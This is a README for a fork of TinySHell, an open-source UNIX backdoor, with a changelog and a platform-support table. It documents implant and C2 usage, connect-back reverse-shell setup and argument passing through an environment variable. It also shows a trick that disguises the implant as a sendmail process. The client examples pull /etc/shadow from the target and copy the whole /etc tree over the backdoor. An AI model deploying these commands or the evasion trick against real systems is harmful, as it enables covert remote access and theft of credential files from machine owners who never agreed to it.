This is an updated fork of creaktives fork of TinySHell, an open source UNIX backdoor.
creaktive added commandline argument parsing which allows you to dynamically set the connectback host, port, and shared secret value at runtime.
Like so:
# implant side
Usage: ./tshd [ -c [ connect_back_host ] ] [ -s secret ] [ -p port ]
# c2 side
Usage: ./tsh [ -s secret ] [ -p port ] [command]
<hostname|cb>
<hostname|cb> get <source-file> <dest-dir>
<hostname|cb> put <source-file> <dest-dir>
I've since added support for passing those arguments through an environmental variable by shamelessly copy-pasting Skyper from The Hackers Choice's implementation of env2argv from the THC fork of dsniff.
So now you can do the following on the implant side:
ENV_ARGS="-c localhost -s HACKTHEPLANET -p 1437" ./tshd
Which is kinda cool, but it gets neater - you can hide the process somewhat with old school trickery like the following - making it look like a sendmail process as an example:
mv tshd sendmail
PATH=.:$PATH ENV_ARGS="-c localhost -s HACKTHEPLANET -p 1437" sendmail
Further changes will follow as testing proceeds and I refactor small bits, try out some bullshit, etc.
For the planned experiments/etc, see the Issues tab where I've created an issue for each "idea" to experiment with.
I can't guarentee any timeline on how fast anything will get done, or in what order, it really depends on free time, effort, etc.
11-04-2024: tested in bind shell mode, working on Ubuntu and FreeBSD targets. Reverse connect mode seems buggy, unclear if network gremlins or other. Build on OpenBSD fails. Plan going forward is to fix the reverse connect mode, then fix the OpenBSD build-time issues, then fix the OpenBSD run-time issues.
12-04-2024: Figured out that the issue with reverse-connection mode was an extra : in the getopt string after a lot of buggering around. Reverse and bind modes now working perfectly on FreeBSD and Ubuntu. Further stress testing needed though.
12-04-2024: currently, the tsh client sends exec bash --login as the default command to pop a shell - tsh_runshell( server, "exec bash --login" ) );, on some systems without bash this causes an error. So we should probably default to "sh" instead?
12-04-2024: issuing a release at this point just as a snapshot of it "working" on Ubuntu/FreeBSD.
13-04-2024: OpenBSD support has been provisionally fixed at this time, though you need to replace "gcc" with "egcc" in the Makefile currently.
14-04-2024: Tested working with dietlibc on Ubuntu, x86_64 platform. Probably can optimise for size.
16-04-2024: Working on ARM Debian
I'll update these as I figure out what is/is not working, etc.
| OS | Distribution | Version | Architecture | Bind Shell Client | Bind Shell Server | Reverse Shell Client | Reverse Shell Server | File Upload | File Download | Env2Args |
|---|---|---|---|---|---|---|---|---|---|---|
| Linux | Ubuntu | 23.10 | x86_64 | YES | YES | YES | YES | UNK | UNK | YES |
| FreeBSD | FreeBSD | 14.0-RELEASE | x86_64 | YES | YES | YES | YES | UNK | UNK | YES |
| OpenBSD | OpenBSD | 7.5 | x86_64 | YES | YES | YES | YES | UNK | UNK | YES |
| Darwin | MacOS | 22.4.0 | ARM | YES | YES | YES | YES | UNK | UNK | YES |
| Linux | Debian | 12 | ARM | YES | YES | YES | YES | UNK | UNK | YES |
Tiny SHell - An open-source UNIX backdoor
* Before compiling Tiny SHell
1. First of all, you should setup your secret key, which
is located in tsh.h; the key can be of any length (use
at least 12 characters for better security).
2. It is advised to change SERVER_PORT, the port on which
the server will be listening for incoming connections.
3. You may want to start tshd in "connect-back" mode if
it runs on on a firewalled box; simply uncomment and
modify CONNECT_BACK_HOST in tsh.h.
* Compiling Tiny SHell
Run "make <system>", where <system> can be any one of these:
linux, freebsd, openbsd, netbsd, cygwin, sunos, irix, hpux, osf
* How to use the server
It can be useful to set $HOME and the file creation mask
before starting the server:
% umask 077; HOME=/var/tmp ./tshd
* How to use the client
Make sure tshd is running on the remote host. You can:
- start a shell:
./tsh <hostname>
- execute a command:
./tsh <hostname> "uname -a"
- transfer files:
./tsh <hostname> get /etc/shadow .
./tsh <hostname> put vmlinuz /boot
Note: if the server runs in connect-back mode, replace
the remote machine hostname with "cb".
* About multiple file transfers
At the moment, Tiny SHell does not support scp-like multiple
and/or recursive file transfers. You can work around this bug
by simply making a tar archive and transferring it. Example:
./tsh host "stty raw; tar -cf - /etc 2>/dev/null" | tar -xvf -
* About terminal modes
On some brain-dead systems (actually, IRIX and HP-UX), Ctrl-C
and other control keys do not work correctly. Fix it with:
% stty intr "^C" erase "^H" eof "^D" susp "^Z" kill "^U"
* About security
Please remember that the secret key is stored in clear inside
both tsh and tshd executables; therefore you should make sure
that no one except you has read access to these two files.
However, you may choose not to store the real (valid) key in
the client, which will then ask for a password when it starts.